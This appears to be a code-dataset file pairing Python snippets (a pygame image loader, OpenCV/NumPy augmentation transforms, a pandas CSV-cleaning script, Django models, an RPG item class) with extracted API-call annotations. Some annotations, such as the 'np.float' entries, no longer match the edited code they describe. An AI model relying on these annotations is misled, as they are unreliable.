main_dir = os.path.dirname(os.path.abspath(__file__))
data_dir = os.path.join(main_dir, 'data')
def load_image(name, colorkey=None):
    """Load an image from the data directory and convert it for fast blitting.

    Args:
        name: File name relative to ``data_dir``.
        colorkey: Optional transparent color.  Pass -1 to use the color of
            the top-left pixel; pass None for no transparency.

    Returns:
        (surface, rect) tuple for the loaded image.

    Raises:
        SystemExit: If the image file cannot be loaded.
    """
    fullname = os.path.join(data_dir, name)
    try:
        image = pygame.image.load(fullname)
    except pygame.error:
        print('Cannot load image:', fullname)
        raise SystemExit(str(geterror()))
    image = image.convert()
    if colorkey is not None:
        # BUGFIX: was `colorkey is -1` -- identity comparison against an int
        # literal relies on CPython small-int caching and emits a
        # SyntaxWarning on modern Python; use value equality.
        if colorkey == -1:
            colorkey = image.get_at((0, 0))
        image.set_colorkey(colorkey, RLEACCEL)
    return image, image.get_rect()
class Imageloader():
    """Eagerly loads all tile and sprite images from the data directory."""

    def __init__(self):
        # Terrain tiles: 14 ore + 18 rock variants.
        tilenames = ['blocks/ore'+str(i)+'.png' for i in range(1, 15)] + \
                    ['blocks/rock'+str(i)+'.png' for i in range(1, 19)]
        exanames = ['exa'+str(i)+'.png' for i in range(1, 10)]
        firenames = ['fire'+str(i)+'.png' for i in range(1, 5)]
        heronames = ['hero'+str(i)+'.png' for i in range(1, 8)]
        lumina = ['lumina.png']
        # Tiles keep their background; the animated sprites use the top-left
        # pixel as transparent colorkey (-1, see load_image).
        self.blocks_loaded = [load_image(i) for i in tilenames]
        self.anim_loaded = [load_image(i, -1) for i in exanames]
        self.fire_loaded = [load_image(i, -1) for i in firenames]
        self.hero_loaded = [load_image(i, -1) for i in heronames]
        # FIX: use the `lumina` name list (it was defined but unused, with the
        # file name duplicated as a literal below).
        self.lumina_loaded = [load_image(i, -1) for i in lumina]
| [
"os.path.abspath",
"pygame.image.load",
"os.path.join",
"pygame.compat.geterror"
] | [((192, 222), 'os.path.join', 'os.path.join', (['main_dir', '"""data"""'], {}), "(main_dir, 'data')\n", (204, 222), False, 'import os\n'), ((276, 304), 'os.path.join', 'os.path.join', (['data_dir', 'name'], {}), '(data_dir, name)\n', (288, 304), False, 'import os\n'), ((151, 176), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (166, 176), False, 'import os\n'), ((330, 357), 'pygame.image.load', 'pygame.image.load', (['fullname'], {}), '(fullname)\n', (347, 357), False, 'import pygame\n'), ((458, 468), 'pygame.compat.geterror', 'geterror', ([], {}), '()\n', (466, 468), False, 'from pygame.compat import geterror\n')] |
#!/usr/bin/env python3
import os
def split_path(path):
    """Split a '/'-separated path into its segments, dropping a single
    trailing empty segment (so 'a/b/' yields the same result as 'a/b').

    Note that a leading '/' still produces a leading empty segment.
    """
    parts = path.split('/')
    # str.split always returns at least one element, so only the trailing
    # emptiness needs checking; truthiness replaces the old `len(parts) > 0`.
    if parts and parts[-1] == '':
        parts.pop()
    return parts
def mkdirs(*parts):
    """Join *parts* into a single path, create it via the package's ``io``
    helper, and return the joined path."""
    path = os.path.join(*parts)
    # Local import: the sibling module's `mkdirs` deliberately shadows this
    # function's name here; it performs the actual directory creation.
    from .io import mkdirs
    mkdirs(path)
    return path
| [
"os.path.join"
] | [((211, 231), 'os.path.join', 'os.path.join', (['*parts'], {}), '(*parts)\n', (223, 231), False, 'import os\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is covered by the LICENSE file in the root of this project.
from __future__ import annotations
import typing
import cv2
import numpy as np
class PiRandomTransform:
    """Abstract interface for transformations applied to raster images and to
    sparse two-dimensional point data."""

    def _unimplemented(self, method_name: str) -> NotImplementedError:
        # Build the standard "not implemented" error for a subclass hook.
        return NotImplementedError(
            f"{type(self)}.{method_name} is not yet implemented."
        )

    def resample(self, random: np.random.RandomState):
        """Draw a fresh set of random transformation parameters."""
        raise self._unimplemented("resample")

    def transform_raster(
        self, raster: np.ndarray, interpolation: str, fill_value: int
    ) -> np.ndarray:
        """Apply the transformation to a raster.

        Args:
            interpolation: One of "nearest", "linear", "cubic", "area".
        """
        raise self._unimplemented("transform_raster")

    def transform_points(self, points: np.ndarray) -> np.ndarray:
        """Apply the transformation to points of shape (N, 2), order x, y."""
        raise self._unimplemented("transform_points")
class PiRandomAffineTransform(PiRandomTransform):
    """Random 2-D affine augmentation combining rotation, scaling, shearing
    and translation, each drawn uniformly from a configured range.

    ``resample`` draws a fresh parameter set (the whole transform is skipped
    with probability ``1 - probability``); ``transform_raster`` and
    ``transform_points`` then apply the same 3x3 homogeneous matrix, keeping
    raster data and point annotations aligned.
    """

    def __init__(
        self,
        input_width: int,
        input_height: int,
        output_width: int,
        output_height: int,
        flip_x_probability: float,
        flip_y_probability: float,
        rotation_max: float,
        rotation_min: float,
        scaling_x_max: float,
        scaling_x_min: float,
        scaling_y_max: float,
        scaling_y_min: float,
        shearing_x_max: float,
        shearing_x_min: float,
        shearing_y_max: float,
        shearing_y_min: float,
        translation_x_max: float,
        translation_x_min: float,
        translation_y_max: float,
        translation_y_min: float,
        probability: float,
        **kwargs,
    ):
        """Store the sampling ranges; no parameters are drawn until
        ``resample`` is called."""
        super().__init__()
        self._input_width = input_width
        self._input_height = input_height
        self._output_width = output_width
        self._output_height = output_height
        self._flip_x_probability = flip_x_probability
        self._flip_y_probability = flip_y_probability
        self._rotation_min = rotation_min
        self._rotation_max = rotation_max
        self._scaling_x_min = scaling_x_min
        self._scaling_x_max = scaling_x_max
        self._scaling_y_min = scaling_y_min
        self._scaling_y_max = scaling_y_max
        self._shearing_x_min = shearing_x_min
        self._shearing_x_max = shearing_x_max
        self._shearing_y_min = shearing_y_min
        self._shearing_y_max = shearing_y_max
        self._translate_x_min = translation_x_min
        self._translate_x_max = translation_x_max
        self._translate_y_min = translation_y_min
        self._translate_y_max = translation_y_max
        self._probability = probability
        # Sampled state; populated by resample().
        self._flip_x = None
        self._flip_y = None
        self._rotation = None
        self._scaling_x = None
        self._scaling_y = None
        self._shearing_x = None
        self._shearing_y = None
        self._translate_x = None
        self._translate_y = None
        self._matrix = None
        self._apply = None

    def resample(self, random: np.random.RandomState):
        """Draw a new parameter set and precompute the affine matrix.

        With probability ``1 - probability`` the transform is disabled for
        this draw and all sampled state is cleared.
        """
        self._apply = random.choice(
            [True, False], p=[self._probability, 1.0 - self._probability]
        )
        if not self._apply:
            self._flip_x = None
            self._flip_y = None
            self._rotation = None
            self._scaling_x = None
            self._scaling_y = None
            self._shearing_x = None
            self._shearing_y = None
            self._translate_x = None
            self._translate_y = None
            self._matrix = None
            return
        # NOTE(review): the flip flags are sampled but never folded into the
        # matrix below -- confirm whether flipping is applied elsewhere.
        self._flip_x = random.choice(
            [True, False],
            p=[self._flip_x_probability, 1.0 - self._flip_x_probability],
            replace=False,
        )
        self._flip_y = random.choice(
            [True, False],
            p=[self._flip_y_probability, 1.0 - self._flip_y_probability],
            replace=False,
        )
        self._rotation = random.uniform(self._rotation_min, self._rotation_max)
        self._scaling_x = random.uniform(self._scaling_x_min, self._scaling_x_max)
        self._scaling_y = random.uniform(self._scaling_y_min, self._scaling_y_max)
        self._shearing_x = random.uniform(self._shearing_x_min, self._shearing_x_max)
        self._shearing_y = random.uniform(self._shearing_y_min, self._shearing_y_max)
        self._translate_x = random.uniform(self._translate_x_min, self._translate_x_max)
        self._translate_y = random.uniform(self._translate_y_min, self._translate_y_max)
        # Construct the transformation matrix as a chain of homogeneous 3x3
        # steps: center input -> scale/shear -> rotate -> translate -> center
        # output.  BUGFIX: `np.float` was removed in NumPy 1.24; the builtin
        # `float` is the documented equivalent.
        translation_1 = np.eye(3, dtype=float)
        translation_1[0, 2] = -0.5 * self._input_width
        translation_1[1, 2] = -0.5 * self._input_height
        scaling = np.eye(3, dtype=float)
        scaling[0, 0] = self._scaling_x
        scaling[1, 1] = self._scaling_y
        scaling[0, 1] = self._shearing_x
        scaling[1, 0] = self._shearing_y
        scaling[2, 2] = 1.0
        rotation = np.eye(3, dtype=float)
        rotation[0, 0] = np.cos(self._rotation)
        rotation[1, 1] = np.cos(self._rotation)
        rotation[0, 1] = -np.sin(self._rotation)
        rotation[1, 0] = np.sin(self._rotation)
        rotation[2, 2] = 1.0
        translation_2 = np.eye(3, dtype=float)
        translation_2[0, 2] = self._translate_x
        translation_2[1, 2] = self._translate_y
        translation_3 = np.eye(3, dtype=float)
        translation_3[0, 2] = 0.5 * self._output_width
        translation_3[1, 2] = 0.5 * self._output_height
        self._matrix = (
            translation_3 @ translation_2 @ rotation @ scaling @ translation_1
        )

    def transform_raster(
        self,
        raster: np.ndarray,
        interpolation: str,
        fill_value: typing.Union[int, float, np.ndarray],
    ):
        """Warp the raster with the sampled affine matrix.

        Args:
            raster: HxW or HxWxC image.
            interpolation: One of "nearest", "linear", "cubic", "area".
            fill_value: Border fill; an array supplies one value per channel.

        Returns:
            The warped raster sized (output_height, output_width), or the
            input unchanged when the transform is disabled.
        """
        if not self._apply:
            return raster
        interpolation_flag = {
            "nearest": cv2.INTER_NEAREST,
            "linear": cv2.INTER_LINEAR,
            "cubic": cv2.INTER_CUBIC,
            "area": cv2.INTER_AREA,
        }[interpolation]
        channels = 1 if len(raster.shape) == 2 else raster.shape[2]
        if channels not in [1, 3]:
            # apply on each channel separately (warpAffine handles only 1- or
            # 3-channel inputs directly)
            return np.stack(
                [
                    self.transform_raster(
                        raster=raster[..., channel],
                        interpolation=interpolation,
                        fill_value=fill_value[channel]
                        if isinstance(fill_value, np.ndarray)
                        else fill_value,
                    )
                    for channel in range(channels)
                ],
                axis=-1,
            )
        # cv2 wants a scalar or tuple border value, not a numpy array.
        if isinstance(fill_value, np.ndarray) and fill_value.size == 1:
            fill_value = fill_value.item()
        elif isinstance(fill_value, np.ndarray):
            fill_value = tuple(value.item() for value in fill_value)
        return cv2.warpAffine(
            src=raster,
            M=self._matrix[:2, :],
            dsize=(self._output_width, self._output_height),
            flags=interpolation_flag,
            borderMode=cv2.BORDER_CONSTANT,
            borderValue=fill_value,
        )

    def transform_points(self, points: np.ndarray) -> np.ndarray:
        """Apply the sampled affine matrix to points of shape (N, 2), order
        x, y; returns the input unchanged when the transform is disabled."""
        if not self._apply:
            return points
        num_points = points.shape[0]
        # using homogeneous coordinates so translation is a matrix multiply
        # (BUGFIX: np.float -> float, removed in NumPy 1.24)
        points = np.stack(
            [points[:, 0], points[:, 1], np.ones((num_points,), dtype=float)],
            axis=-1,
        )
        return ((self._matrix @ points.T).T)[:, :2]
class PiRandomHsvTransform(PiRandomTransform):
    """Randomly shifts hue, saturation and value of selected raster channels."""

    def __init__(
        self,
        hue_min: float,
        hue_max: float,
        saturation_min: float,
        saturation_max: float,
        value_min: float,
        value_max: float,
        probability: float,
        channels: typing.List[int],
        **kwargs,
    ):
        super().__init__()
        if len(channels) != 3:
            raise ValueError("Three channel indices expected.")
        # Sampling bounds for each HSV component.
        self._hue_min, self._hue_max = hue_min, hue_max
        self._saturation_min, self._saturation_max = saturation_min, saturation_max
        self._value_min, self._value_max = value_min, value_max
        self._probability = probability
        self._channels = channels
        # Per-sample state; populated by resample().
        self._apply = None
        self._hue = None
        self._saturation = None
        self._value = None

    def resample(self, random: np.random.RandomState):
        """Draw whether to apply the transform and, if so, the HSV offsets."""
        keep = 1.0 - self._probability
        self._apply = random.choice([True, False], p=[self._probability, keep])
        if self._apply:
            self._hue = random.uniform(low=self._hue_min, high=self._hue_max)
            self._saturation = random.uniform(
                low=self._saturation_min, high=self._saturation_max
            )
            self._value = random.uniform(low=self._value_min, high=self._value_max)
        else:
            self._hue = self._saturation = self._value = None

    def transform_raster(
        self, raster: np.ndarray, interpolation: str, fill_value: np.ndarray
    ) -> np.ndarray:
        """Apply the sampled HSV shift to the configured channels in place."""
        if not self._apply:
            return raster
        rgb = raster[..., self._channels]
        hsv = cv2.cvtColor(rgb, cv2.COLOR_RGB2HSV)
        # Hue wraps around the 0..360 degree circle.
        hsv[..., 0] = np.remainder(
            360.0 * (hsv[..., 0] / 360.0 + 1.0 + self._hue), 360.0
        )
        # Saturation and value are clamped to the valid [0, 1] range.
        hsv[..., 1] = np.clip(hsv[..., 1] + self._saturation, 0.0, 1.0)
        hsv[..., 2] = np.clip(hsv[..., 2] + self._value, 0.0, 1.0)
        raster[..., self._channels] = cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)
        return raster

    def transform_points(self, points: np.ndarray) -> np.ndarray:
        """Color transforms never move points."""
        if not self._apply:
            return points
        return points
class PiRandomContrastTransform(PiRandomTransform):
    """Randomly stretches the contrast of selected raster channels."""

    def __init__(
        self,
        contrast_min: float,
        contrast_max: float,
        probability: float,
        channels: typing.List[int],
        **kwargs,
    ):
        super().__init__()
        # Sampling bounds for the contrast factor.
        self._contrast_min = contrast_min
        self._contrast_max = contrast_max
        self._probability = probability
        self._channels = channels
        # Per-sample state; populated by resample().
        self._contrast = None
        self._apply = None

    def resample(self, random: np.random.RandomState):
        """Draw whether to apply the transform and, if so, the contrast factor."""
        self._apply = random.choice(
            [True, False], p=[self._probability, 1.0 - self._probability]
        )
        if self._apply:
            self._contrast = random.uniform(
                low=self._contrast_min, high=self._contrast_max
            )
        else:
            self._contrast = None

    def transform_raster(
        self, raster: np.ndarray, interpolation: str, fill_value: np.ndarray
    ) -> np.ndarray:
        """Stretch the selected channels around their per-channel mean."""
        if not self._apply:
            return raster
        rgb = raster[..., self._channels]
        # Per-channel mean over all pixels, broadcastable back onto the image.
        mean = np.mean(rgb.reshape(-1, 3), axis=0).reshape(1, 1, 3)
        raster[..., self._channels] = np.clip(
            (rgb - mean) * (1.0 + self._contrast) + mean, 0.0, 1.0
        )
        return raster

    def transform_points(self, points: np.ndarray) -> np.ndarray:
        """Contrast changes never move points."""
        if not self._apply:
            return points
        return points
class PiRandomBlurTransform(PiRandomTransform):
    """Randomly applies a Gaussian blur to selected raster channels."""

    def __init__(
        self,
        blur_min: float,
        blur_max: float,
        probability: float,
        channels: typing.List[int],
        **kwargs,
    ):
        super().__init__()
        # Sampling bounds for the Gaussian sigma.
        self._blur_min = blur_min
        self._blur_max = blur_max
        self._probability = probability
        self._channels = channels
        # Per-sample state; populated by resample().
        self._blur = None
        # BUGFIX: initialize _apply like the sibling transform classes do,
        # so transform_raster()/transform_points() do not raise
        # AttributeError when called before the first resample().
        self._apply = None

    def resample(self, random: np.random.RandomState):
        """Draw whether to apply the transform and, if so, the blur sigma."""
        self._apply = random.choice(
            [True, False], p=[self._probability, 1.0 - self._probability]
        )
        if not self._apply:
            self._blur = None
            return
        self._blur = random.uniform(low=self._blur_min, high=self._blur_max)

    def transform_raster(
        self, raster: np.ndarray, interpolation: str, fill_value: np.ndarray
    ) -> np.ndarray:
        """Blur the selected channels with the sampled Gaussian sigma."""
        if not self._apply:
            return raster
        if self._blur == 0.0:
            # A sigma of exactly zero is a no-op (and invalid for GaussianBlur).
            return raster
        rgb = raster[..., self._channels]
        # Kernel size (0, 0) lets OpenCV derive the kernel size from sigmaX.
        rgb = cv2.GaussianBlur(rgb, (0, 0), sigmaX=self._blur)
        raster[..., self._channels] = rgb
        return raster

    def transform_points(self, points: np.ndarray) -> np.ndarray:
        """Blurring never moves points."""
        if not self._apply:
            return points
        return points
| [
"numpy.clip",
"numpy.eye",
"cv2.warpAffine",
"numpy.ones",
"numpy.cos",
"cv2.cvtColor",
"numpy.sin",
"cv2.GaussianBlur",
"numpy.remainder"
] | [((4723, 4748), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (4729, 4748), True, 'import numpy as np\n'), ((4879, 4904), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (4885, 4904), True, 'import numpy as np\n'), ((5115, 5140), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (5121, 5140), True, 'import numpy as np\n'), ((5166, 5188), 'numpy.cos', 'np.cos', (['self._rotation'], {}), '(self._rotation)\n', (5172, 5188), True, 'import numpy as np\n'), ((5214, 5236), 'numpy.cos', 'np.cos', (['self._rotation'], {}), '(self._rotation)\n', (5220, 5236), True, 'import numpy as np\n'), ((5311, 5333), 'numpy.sin', 'np.sin', (['self._rotation'], {}), '(self._rotation)\n', (5317, 5333), True, 'import numpy as np\n'), ((5388, 5413), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (5394, 5413), True, 'import numpy as np\n'), ((5535, 5560), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (5541, 5560), True, 'import numpy as np\n'), ((7103, 7292), 'cv2.warpAffine', 'cv2.warpAffine', ([], {'src': 'raster', 'M': 'self._matrix[:2, :]', 'dsize': '(self._output_width, self._output_height)', 'flags': 'interpolation_flag', 'borderMode': 'cv2.BORDER_CONSTANT', 'borderValue': 'fill_value'}), '(src=raster, M=self._matrix[:2, :], dsize=(self._output_width,\n self._output_height), flags=interpolation_flag, borderMode=cv2.\n BORDER_CONSTANT, borderValue=fill_value)\n', (7117, 7292), False, 'import cv2\n'), ((9530, 9566), 'cv2.cvtColor', 'cv2.cvtColor', (['rgb', 'cv2.COLOR_RGB2HSV'], {}), '(rgb, cv2.COLOR_RGB2HSV)\n', (9542, 9566), False, 'import cv2\n'), ((9604, 9672), 'numpy.remainder', 'np.remainder', (['(360.0 * (hsv[..., 0] / 360.0 + 1.0 + self._hue))', '(360.0)'], {}), '(360.0 * (hsv[..., 0] / 360.0 + 1.0 + self._hue), 360.0)\n', (9616, 9672), True, 'import numpy as np\n'), ((9739, 9788), 'numpy.clip', 'np.clip', 
(['(hsv[..., 1] + self._saturation)', '(0.0)', '(1.0)'], {}), '(hsv[..., 1] + self._saturation, 0.0, 1.0)\n', (9746, 9788), True, 'import numpy as np\n'), ((9828, 9872), 'numpy.clip', 'np.clip', (['(hsv[..., 2] + self._value)', '(0.0)', '(1.0)'], {}), '(hsv[..., 2] + self._value, 0.0, 1.0)\n', (9835, 9872), True, 'import numpy as np\n'), ((9888, 9924), 'cv2.cvtColor', 'cv2.cvtColor', (['hsv', 'cv2.COLOR_HSV2RGB'], {}), '(hsv, cv2.COLOR_HSV2RGB)\n', (9900, 9924), False, 'import cv2\n'), ((11413, 11476), 'numpy.clip', 'np.clip', (['((rgb - mean) * (1.0 + self._contrast) + mean)', '(0.0)', '(1.0)'], {}), '((rgb - mean) * (1.0 + self._contrast) + mean, 0.0, 1.0)\n', (11420, 11476), True, 'import numpy as np\n'), ((12809, 12857), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['rgb', '(0, 0)'], {'sigmaX': 'self._blur'}), '(rgb, (0, 0), sigmaX=self._blur)\n', (12825, 12857), False, 'import cv2\n'), ((5263, 5285), 'numpy.sin', 'np.sin', (['self._rotation'], {}), '(self._rotation)\n', (5269, 5285), True, 'import numpy as np\n'), ((7634, 7672), 'numpy.ones', 'np.ones', (['(num_points,)'], {'dtype': 'np.float'}), '((num_points,), dtype=np.float)\n', (7641, 7672), True, 'import numpy as np\n')] |
#!/usr/bin/python
# Gather the per-file EOB CSV exports into one frame, then clean it.
import pandas as pd
import numpy as np
# code to gather together the code
# I am working from the CollegeSprint folder
import os

path = "/home/debasish/Desktop/CollegeSprint/Files"
file_list = sorted(os.listdir(path))
# Columns that identify an EOB row; rows where ALL of these are null at the
# same time carry no information and are dropped.
delcol = ['eob_id','batch_arrival_time','eob_plan_type','eob_patient_account_number',
'eob_claim_type','batch_deposit_date','payer_id','claim_information_id',
'eob_payer','payid','eob_service_line','eob_min_date_of_service_from','eob_max_date_of_service_to']
# BUGFIX/modernization: DataFrame.append() was deprecated and removed in
# pandas 2.0, and calling it inside the loop is quadratic; collect the
# frames and concatenate once instead.
frames = []
for file in file_list:
    eachFilePath = path + '/' + file
    df = pd.read_csv(eachFilePath, header=0)
    # Drop rows where every identifying column is null at the same time.
    df = df.dropna(axis=0, how='all', subset=delcol)
    frames.append(df)
mainFrame = pd.concat(frames, ignore_index=True) if frames else pd.DataFrame()
mainFrame.to_csv('output.csv', index=False)

# Clean further: above we only deleted rows where all delcol were null simultaneously.
df = pd.read_csv('output.csv', header=0)
# check no of nulls in columns still
df1 = df.isnull().sum()
df1[df1 > 0]
# output
# claim_payer_name 4
# eob_plan_type 13
# eob_claim_type 13
# check the no of unique data in these columns
nullcol = df1[df1 > 0].index
for col in nullcol:
    print(col, ":", len(df[col].unique()))
# output
# claim_payer_name : 11233
# eob_plan_type : 36
# eob_claim_type : 8
# claim_payer_name has too many unique values to impute sensibly, so delete
# the rows where it is null; the other two columns are imputed below.
df = df.dropna(axis=0, subset=['claim_payer_name'])
# we see both the columns are null together
df1 = df[(df['eob_plan_type'].isnull())]
df1[['eob_plan_type', 'eob_claim_type']]
# impute the 13 null entries of each column with the mode
df['eob_plan_type'] = df['eob_plan_type'].fillna(df['eob_plan_type'].mode().astype(str).iloc[0])
df['eob_claim_type'] = df['eob_claim_type'].fillna(df['eob_claim_type'].mode().astype(str).iloc[0])
df.to_csv('outputCleaned.csv', index=False)
| [
"pandas.DataFrame",
"os.listdir",
"pandas.read_csv"
] | [((254, 268), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (266, 268), True, 'import pandas as pd\n'), ((902, 937), 'pandas.read_csv', 'pd.read_csv', (['"""output.csv"""'], {'header': '(0)'}), "('output.csv', header=0)\n", (913, 937), True, 'import pandas as pd\n'), ((223, 239), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (233, 239), False, 'import os\n'), ((596, 631), 'pandas.read_csv', 'pd.read_csv', (['eachFilePath'], {'header': '(0)'}), '(eachFilePath, header=0)\n', (607, 631), True, 'import pandas as pd\n')] |
from django.db import models
from django.utils import timezone
from django.urls import reverse
from django.contrib.auth.models import User
from user_auth.choices import *
def upload_room_images(instance, filename):
    """Build the storage path for a room gallery image: Room/Images/<room>/<filename>.

    Used as the ``upload_to`` callable of ``RoomImages.room_image``; Django
    passes the model instance and the original filename.
    """
    # BUGFIX: the original format string never interpolated the filename,
    # so every upload for a room collapsed onto the same path.
    return "Room/Images/{room}/{filename}".format(room=instance.room, filename=filename)
def upload_cover_image(instance, filename):
    """Build the storage path for a room's cover image: Room/cover/<id>/<filename>.

    Used as the ``upload_to`` callable of ``Room.cover_image``; Django
    passes the model instance and the original filename.
    """
    # BUGFIX: interpolate the filename instead of dropping it from the path,
    # so covers of different rooms do not collide.
    return "Room/cover/{id}/{filename}".format(id=instance.id, filename=filename)
class Room(models.Model):
    """A rentable room listing posted by a user."""
    # NOTE(review): "ownner" is a typo for "owner"; renaming the field would
    # change the database column and needs a migration, so it is left as-is.
    ownner = models.ForeignKey(User, on_delete=models.CASCADE)
    state = models.CharField(choices = STATES_UNION_TERRITORIES,blank=False, max_length=256 )
    city_area = models.CharField(blank=False, max_length=256)
    street_address = models.CharField(blank=False, max_length=300)
    mobile = models.BigIntegerField(blank=False)
    # NOTE(review): free-text status; a choices list would prevent typos.
    room_status = models.CharField(blank=False, max_length=10)
    religious_group = models.CharField(choices = RELIGIOUS_GROUP , max_length=15)
    # NOTE(review): rent is stored as text; a numeric field would allow range queries.
    monthly_rent = models.CharField(blank=False,max_length=10)
    # NOTE(review): "desciption" is a typo for "description"; left unchanged
    # to avoid a schema migration.
    desciption = models.TextField(blank=True,max_length=2048)
    added_date = models.DateTimeField(auto_now=True)
    cover_image = models.ImageField(upload_to =upload_cover_image, blank=False )
    def __str__(self):
        # Human-readable identifier used in the admin and shell.
        return "Room-{id}".format(id=str(self.id))
class RoomImages(models.Model):
    """An additional gallery image attached to a Room."""
    # Reverse accessor: room.room_images.all()
    room = models.ForeignKey(Room, on_delete=models.CASCADE ,related_name='room_images')
    room_image = models.ImageField(upload_to=upload_room_images,null=False, blank=False)
    def get_absolute_url(self):
        # Redirect target used by Django's generic create/update views.
        return reverse("room_service:room_list")
    def __str__(self):
        return str(self.room)
| [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.ImageField",
"django.db.models.BigIntegerField",
"django.urls.reverse",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((472, 521), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (489, 521), False, 'from django.db import models\n'), ((534, 613), 'django.db.models.CharField', 'models.CharField', ([], {'choices': 'STATES_UNION_TERRITORIES', 'blank': '(False)', 'max_length': '(256)'}), '(choices=STATES_UNION_TERRITORIES, blank=False, max_length=256)\n', (550, 613), False, 'from django.db import models\n'), ((632, 677), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(False)', 'max_length': '(256)'}), '(blank=False, max_length=256)\n', (648, 677), False, 'from django.db import models\n'), ((699, 744), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(False)', 'max_length': '(300)'}), '(blank=False, max_length=300)\n', (715, 744), False, 'from django.db import models\n'), ((758, 793), 'django.db.models.BigIntegerField', 'models.BigIntegerField', ([], {'blank': '(False)'}), '(blank=False)\n', (780, 793), False, 'from django.db import models\n'), ((812, 856), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(False)', 'max_length': '(10)'}), '(blank=False, max_length=10)\n', (828, 856), False, 'from django.db import models\n'), ((879, 935), 'django.db.models.CharField', 'models.CharField', ([], {'choices': 'RELIGIOUS_GROUP', 'max_length': '(15)'}), '(choices=RELIGIOUS_GROUP, max_length=15)\n', (895, 935), False, 'from django.db import models\n'), ((958, 1002), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(False)', 'max_length': '(10)'}), '(blank=False, max_length=10)\n', (974, 1002), False, 'from django.db import models\n'), ((1019, 1064), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(2048)'}), '(blank=True, max_length=2048)\n', (1035, 1064), False, 'from django.db import models\n'), ((1081, 1116), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': 
'(True)'}), '(auto_now=True)\n', (1101, 1116), False, 'from django.db import models\n'), ((1135, 1195), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': 'upload_cover_image', 'blank': '(False)'}), '(upload_to=upload_cover_image, blank=False)\n', (1152, 1195), False, 'from django.db import models\n'), ((1319, 1396), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Room'], {'on_delete': 'models.CASCADE', 'related_name': '"""room_images"""'}), "(Room, on_delete=models.CASCADE, related_name='room_images')\n", (1336, 1396), False, 'from django.db import models\n'), ((1414, 1486), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': 'upload_room_images', 'null': '(False)', 'blank': '(False)'}), '(upload_to=upload_room_images, null=False, blank=False)\n', (1431, 1486), False, 'from django.db import models\n'), ((1534, 1567), 'django.urls.reverse', 'reverse', (['"""room_service:room_list"""'], {}), "('room_service:room_list')\n", (1541, 1567), False, 'from django.urls import reverse\n')] |
import random
from .consts import ITEM_SLOT_ARMOR, ITEM_SLOT_WEAPON
from .utility import get_random_array_element
class Item:
    """A randomly generated, level-scaled weapon or armor piece.

    Display names are assembled from three translatable parts (affix,
    type and suffix) drawn from the class-level ``weapon_list`` /
    ``armor_list`` catalogues, which are populated elsewhere and are
    expected to carry "affixes", "types" and "suffixes" arrays.
    """
    # Shared name-part catalogues; filled in externally before items are made.
    weapon_list = {}
    armor_list = {}
    def __init__(self, level: int, slot: int):
        # Pick random name parts from the catalogue matching the slot.
        if slot == ITEM_SLOT_WEAPON:
            self.affix = get_random_array_element(Item.weapon_list["affixes"])
            self.type = get_random_array_element(Item.weapon_list["types"])
            self.suffix = get_random_array_element(Item.weapon_list["suffixes"])
        if slot == ITEM_SLOT_ARMOR:
            self.affix = get_random_array_element(Item.armor_list["affixes"])
            self.type = get_random_array_element(Item.armor_list["types"])
            self.suffix = get_random_array_element(Item.armor_list["suffixes"])
        # Item level drawn from roughly [1, level + 1).
        # NOTE(review): rounding can yield level + 1 for high draws — confirm
        # whether the cap is meant to be inclusive of `level` only.
        self.level = round(random.random() * level + 1)
        self.slot = slot
        # Set by equip(); while None the raw (untranslated) name is used.
        self.owner = None
    @property
    def name(self) -> str:
        """Localized display name, or the raw parts while unowned."""
        if self.owner is None:
            return self._name
        else:
            return "{0} {1} {2}".format(self.owner.trans.get_message(self.affix, self.owner.locale,
                                                                     connected_word=self.type),
                                        self.owner.trans.get_message(self.type, self.owner.locale),
                                        self.owner.trans.get_message(self.suffix, self.owner.locale))
    def name_in_form(self, is_ablative: bool = False, is_accusative: bool = False) -> str:
        """Localized name with a grammatical case applied to affix and type."""
        if self.owner is None:
            return self._name
        else:
            return "{0} {1} {2}".format(self.owner.trans.get_message(self.affix, self.owner.locale,
                                                                     connected_word=self.type, is_ablative=is_ablative,
                                                                     is_accusative=is_accusative),
                                        self.owner.trans.get_message(self.type, self.owner.locale,
                                                                     is_ablative=is_ablative,
                                                                     is_accusative=is_accusative),
                                        self.owner.trans.get_message(self.suffix, self.owner.locale))
    @property
    def _name(self) -> str:
        # Untranslated fallback: the raw space-joined parts.
        return "{0} {1} {2}".format(self.affix, self.type, self.suffix)
    @property
    def price(self) -> int:
        # Flat price scaling with item level.
        return self.level * 250
    @property
    def attack(self) -> int:
        # Only weapons grant attack; armor contributes 0.
        res = 0
        if self.slot == ITEM_SLOT_WEAPON:
            res = self.level
        return res
    @property
    def defence(self) -> int:
        # Only armor grants defence; weapons contribute 0.
        res = 0
        if self.slot == ITEM_SLOT_ARMOR:
            res = self.level
        return res
    # recover parts of name from result string
    def set_name(self, name: str):
        """Parse a space-joined name back into affix/type/suffix.

        Each part is grown greedily word by word until it matches a known
        entry in the slot's catalogue, so multi-word parts are supported.
        """
